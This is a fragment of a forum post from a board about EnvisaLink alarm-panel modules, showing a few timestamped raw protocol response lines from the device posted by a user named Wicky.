[20200619_091410] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091413] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091430] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091439] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091454] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091458] response: '61000229\r\n6501CC\r\n' (length 18)

Wicky


Return to “EnvisaLink ( IP100D, IP170D, 2DS, 3, 4)”

Who is online

Users browsing this forum: No registered users and 3 guests